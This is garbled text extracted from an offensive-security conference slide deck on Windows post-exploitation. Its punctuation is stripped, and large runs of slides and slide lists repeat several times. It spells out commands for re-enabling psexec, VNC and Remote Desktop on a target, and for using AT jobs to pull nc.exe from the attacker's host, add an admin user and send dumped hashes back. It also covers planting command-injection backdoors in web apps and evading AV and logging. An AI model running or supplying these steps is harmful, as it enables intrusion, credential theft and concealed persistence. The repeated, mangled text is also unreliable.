Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
